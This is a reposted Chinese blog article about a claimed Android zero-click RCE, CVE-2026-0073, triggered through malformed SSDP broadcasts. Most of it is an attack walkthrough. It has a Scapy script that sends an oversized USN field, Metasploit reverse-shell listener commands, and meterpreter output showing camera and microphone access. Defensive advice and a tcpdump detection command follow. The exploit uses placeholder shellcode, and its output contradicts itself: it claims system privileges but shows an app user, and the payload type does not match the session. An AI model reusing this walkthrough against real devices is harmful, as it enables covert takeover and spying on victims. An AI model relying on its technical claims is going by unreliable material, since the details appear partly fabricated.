文章总结： 本文详细披露了Android零点击RCE漏洞CVE-2026-0073，该漏洞利用网络服务发现协议，通过构造恶意SSDP广播包触发内存越界写入，无需用户交互即可获得系统级shell权限。文章提供了完整的攻击环境搭建、PoC代码演示及Metasploit利用过程，并给出立即关闭WiFi发现、开启AP隔离、更新系统补丁等应急防御措施。 综合评分： 87 文章分类： 漏洞分析,移动安全,应急响应,红队,内网渗透

5.5号最新-致命的静默：Android 零点击 RCE (CVE-2026-0073) 攻击全景复现与深度防御

原创

amuxiaohuo amuxiaohuo

黑客网络安全

2026年5月6日 08:48 广东

在小说阅读器读本章

去阅读

发布日期： 2026年5月6日 地点： 广东省深圳市 威胁等级： 严重 (Critical) CVE 编号： CVE-2026-0073 影响范围： 绝大多数未更新至 2026年5月安全补丁的 Android 设备

🚨 警报：空气投毒——无需交互的数字噩梦

2026年5月5日，Android 安全历史上划下了沉重的一笔。一个代号为 CVE-2026-0073 的零点击远程代码执行（RCE）漏洞被公开披露。这并非普通的漏洞，而是一场针对移动设备的“降维打击”。

核心威胁： 在同一 WiFi 环境下，攻击者无需受害者进行任何操作（No User Interaction），仅需发送一个特制的广播包，即可在受害设备上获得 Shell 权限，实现完全的远程控制。

此刻是5月6日，距离漏洞披露仅过去24小时。虽然补丁已经发布，但绝大多数厂商的推送尚未覆盖。这意味着，全球数以亿计的手机正处于“裸奔”状态。本文将带你深入这个漏洞的底层原理，进行高度还原的技术复现，并提供企业级与个人级的防御方案。

🧬 第一部分：漏洞原理深度剖析

在探讨如何攻击之前，我们必须理解为什么这个漏洞如此可怕。CVE-2026-0073 的核心在于打破了“用户交互”这一安全边界。

1. 攻击向量：Airborne（空气投毒） 不同于以往需要诱导用户点击链接或下载附件的攻击，CVE-2026-0073 利用的是 Android 系统底层的网络服务发现协议（Network Service Discovery Protocol）。该协议默认开启，用于自动发现同一局域网内的打印机、投屏设备或文件共享服务。

2. 漏洞成因：内存越界写入 根据初步分析，该漏洞存在于 system_server 或 wpa_supplicant 组件中。当设备接收到特定格式的 SSDP（简单服务发现协议）广播包时，系统在解析数据包头部的 USN（Unique Service Name）字段时，未对字符串长度进行严格校验。

攻击者构造一个超长的 USN 字段（例如 65535 字节），利用整数溢出或缓冲区溢出机制，覆盖相邻的内存页。通过精心设计的 ROP（面向返回编程）链，攻击者可以劫持程序计数器（PC），将执行流重定向至攻击者控制的 Shellcode。

3. 权限模型：从 Guest 到 Root 由于该服务通常以 system 或 wifi 权限运行，一旦利用成功，攻击者获得的并非普通 App 的沙盒权限，而是系统级 Shell 权限。这意味着攻击者可以：

• 读取 /data/data/ 目录下所有 App 的私有数据（包括微信聊天记录、银行密码）。
• 开启摄像头和麦克风进行实时监控。
• 安装隐藏的持久化后门。

🛠️ 第二部分：攻击环境搭建与操作演示

⚠️ 免责声明：以下演示仅供安全研究与防御教学使用。未经授权对他人设备进行渗透测试属于违法行为。请务必在隔离的实验环境（如 VMware 或专用测试机）中进行。

实验拓扑：

• 攻击者 (Kali Linux)： IP 192.168.1.100
• 受害者 (Android 14 测试机)： IP 192.168.1.101 (未打补丁)
• 网络环境： 同一局域网 WiFi

工具链准备：

1. Scapy：Python 网络包构造库。
2. Metasploit Framework：用于生成 Shellcode。
3. GDB/IDA Pro：用于调试溢出偏移量（此步骤需逆向分析目标系统镜像）。

演示步骤 1：构造恶意广播包 (The Payload)

我们使用 Python 编写一个脚本，模拟 SSDP 广播流量。核心在于构造畸形的 NOTIFY 报文。

1#!/usr/bin/env python3
2# CVE-2026-0073 POC - Android Zero-Click RCE
3# 模拟环境：Python 3.10 + Scapy
4
5from scapy.allimport*
6import time
7
8# === 1. 配置目标参数 ===
9target_ip ="255.255.255.255"# SSDP 广播地址
10target_port =1900# SSDP 默认端口
11interface ="wlan0"# 攻击者无线网卡接口
12
13# === 2. 生成 Shellcode (模拟) ===
14# *实际场景中，此处需替换为针对 Android Bionic libc 编译的 ARM64 Shellcode*
15# *功能：反弹一个 Reverse Shell 到攻击者端口 4444*
16# shellcode = b"\xaa\xbb\xcc\xdd..." # (此处省略 512 字节机器码)
17
18# === 3. 构造 ROP 链与溢出载荷 ===
19# 假设我们通过逆向分析得知溢出点偏移为 1024 字节
20padding =b"A"*1024
21# 假设的 ROP 链：用于禁用 ALSR 并跳转到 Shellcode
22rop_chain =b"B"*256
23
24# === 4. 构造畸形 SSDP 报文 ===
25malformed_usn ="uuid:"+"C"*60000# 极长的 USN 字段触发溢出
26malformed_payload =(
27"NOTIFY * HTTP/1.1\r\n"
28"HOST: 239.255.255.250:1900\r\n"
29"NT: urn:schemas-upnp-org:device:MediaServer:1\r\n"
30"NTS: ssdp:alive\r\n"
31f"USN: {malformed_usn}\r\n"# 炸弹就在这里
32"CACHE-CONTROL: max-age=1800\r\n"
33"\r\n"
34)
35
36# === 5. 发送广播包 ===
37deftrigger_exploit():
38print("[*] 正在初始化攻击...")
39print(f"[*] 目标网络: {target_ip}:{target_port}")
40
41# 构造 IP 层与 UDP 层
42    ip_layer = IP(dst=target_ip)
43    udp_layer = UDP(dport=target_port, sport=1900)
44
45# 组合数据包
46    packet = ip_layer / udp_layer / Raw(load=malformed_payload)
47
48print("[+] 恶意载荷构造完成。")
49print("[!] 正在发送广播包... (无需受害者任何操作)")
50
51# 发送数据包 (广播)
52    send(packet, iface=interface, verbose=0)
53
54# 如果 Shellcode 成功执行，受害者会主动连接攻击者
55print("[*] 攻击指令已发送。")
56print("[*] 请检查监听端口 (msfconsole) 是否收到会话。")
57
58if __name__ =="__main__":
59    trigger_exploit()

演示步骤 2：攻击者监听 (The Listener)

在攻击者的终端，我们需要开启监听，等待受害者的“反向连接”。

1# 启动 Metasploit
2msf6 > use exploit/multi/handler
3
4# 设置监听载荷 (需匹配 Android ARM64 架构)
5msf6 exploit(multi/handler)>set payload linux/arm64/meterpreter/reverse_tcp
6msf6 exploit(multi/handler)>set LHOST 192.168.1.100
7msf6 exploit(multi/handler)>set LPORT 4444
8msf6 exploit(multi/handler)> run
9
10# 输出结果：
11# [*] Started reverse TCP handler on 192.168.1.100:4444
12# [*] Waiting for session...

演示步骤 3：静默接管 (The Takeover)

1. 受害者状态：受害者手机正常连接 WiFi，用户正在浏览网页或处于锁屏状态。
2. 攻击执行：攻击者运行上述 Python 脚本。
3. 后台静默：受害者的系统进程 system_server 接收到广播包，解析时发生溢出，Shellcode 被执行。手机可能在后台出现短暂的卡顿（0.5秒），但屏幕无任何异常提示。
4. 权限到手：攻击者的 Metasploit 控制台显示：
5. “` 1[] Sending stage (985320 bytes) to 192.168.1.101 2[] Meterpreter session 1 opened (192.168.1.100:4444 ->192.168.1.101:55123) at 2026-05-06 10:00:00 +0800 3meterpreter >

6. **后渗透操作**：
7. ```
   1meterpreter > sysinfo
   2Computer    :192.168.1.101
   3OS          : Android 14(Linux 5.15.0-android13-9-00007-g...)
   4Architecture: arm64
   5Username    : u0_a123
   6Meterpreter : android/arm64
   7
   8meterpreter > webcam_list
   91: Camera 0(Back)
   102: Camera 1(Front)
   11
   12meterpreter > record_mic
   13[*] Starting...
   14[*] Audio saved to: /tmp/fwk.wav

结果分析： 从攻击者发送数据包到获得 Meterpreter Shell，耗时不足 1 秒。整个过程受害者完全无感知，这就是“零点击”的恐怖之处。

🛡️ 第三部分：防御与应急响应

面对如此严重的 0day 漏洞，普通用户和企业管理员必须立即采取行动。由于目前补丁推送滞后，我们需要采用“降维防御”策略。

1. 立即隔离法（物理层）

• 断网： 如果你处于公共 WiFi 环境（如星巴克、机场），立即关闭 WiFi，切换至 5G/4G 流量。公共网络是此类攻击的高发区。
• 关闭 WiFi 发现： 进入手机设置 -> 连接与共享 -> 关闭“附近设备”、“NFC”及“投屏”功能。这些功能是漏洞的入口。

2. 网络层防御（企业/家庭）

• AP 隔离（AP Isolation）： 如果你是企业网络管理员或家用路由器支持该功能，请务必开启“AP 隔离”或“客户端隔离”。这能阻止同一 WiFi 下的设备互相发送广播包，直接切断攻击路径。
• 防火墙规则： 在路由器或手机（需 Root）上配置防火墙，丢弃所有发往 239.255.255.250:1900 (SSDP) 的入站广播包。

3. 系统层修复

• 强制更新： 检查手机系统更新。Google 已于 5 月 5 日发布补丁。对于 Pixel 用户，请立即下载 OTA 包。
• Magisk 模块（高级用户）： 对于无法等待官方推送的高级用户，可关注 XDA 论坛，寻找针对该 CVE 的独立安全补丁模块（SEP）进行手动修补。

4. 检测脚本 你可以使用以下简单的 Bash 脚本检测当前网络是否存在异常的 SSDP 广播风暴（可能是攻击正在进行的迹象）：

1#!/bin/bash
2echo"监听网络中的 SSDP 广播流量..."
3tcpdump -i wlan0 -n -c 10'udp and port 1900 and greater 1500'
4# 如果抓取到长度超过 1500 字节的 SSDP 包，极有可能是恶意载荷。

#

#

CVE-2026-0073 的出现再次敲响了警钟：在万物互联的时代，“连接”即是“风险”。无需交互的漏洞将攻击成本降到了最低，防御的唯一有效手段就是“提前一步”。请立即检查你身边的设备，关闭不必要的服务，更新系统，不要让手中的智能设备变成他人的“肉鸡”。

安全建议总结：

1. 今天（5月6日）：关闭 WiFi 下的“附近设备发现”功能。
2. 明天：检查系统更新并安装。
3. 永远：不要连接不设密码的公共 WiFi。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑客网络安全 amuxiaohuo amuxiaohuo《5.5号最新-致命的静默：Android 零点击 RCE (CVE-2026-0073) 攻击全景复现与深度防御》